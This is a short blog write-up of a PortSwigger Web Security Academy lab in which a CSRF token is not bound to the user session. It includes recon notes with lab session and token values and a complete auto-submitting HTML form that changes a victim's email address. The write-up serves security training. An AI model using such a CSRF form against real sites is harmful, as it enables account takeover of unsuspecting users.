Lab: CSRF where token is not tied to user session

Posted on | Post modified | In |

Lab: CSRF where token is not tied to user session

tags: Portswigger Web Security Academy Web
  • Description: This lab’s email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren’t integrated into the site’s session handling system.
  • Goal: To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address. You have two accounts on the application that you can use to help design your attack. The credentials are as follows: wiener:peter carlos:montoya

Background

CSRF token should tied to user session otherwise, it’ll exploited by attacker.

Recon

  1. Username: wiener Session: l3IjqV4KRDAmncviJTvP80KK3RAHDJLG CSRF Token: u4wMMtIhhUoTlc2LgadJFNRKOZ6bFAZr

  2. Username: carlos Session: Goc2H2lmU9Ki7Of4IcOWpE4XFNMWFslR CSRF Token: UGabdiPPbGaTLsSa8vOV6MfBEvi2nGQ3

  3. What if we change session or csrf_token? It seems work properly which means the user session didn’t tie with unique csrf_token

Exp

The csrf token should be altered to another token that was intercepted by Burp Suite which means this token haven’t sent it. So, we can altered a package to forge another user to achieve CSRF. Exploit Payload:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a5200320345733f806803640046007d.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="danger&#64;gmail&#46;com" />
      <input type="hidden" name="csrf" value="u4wMMtIhhUoTlc2LgadJFNRKOZ6bFAZr" />
    </form>
    <script>
          document.forms[0].submit();
    </script>
  </body>
</html>

:::spoiler Success Screenshot :::

Reference

Lab: CSRF where token is not tied to user session - write up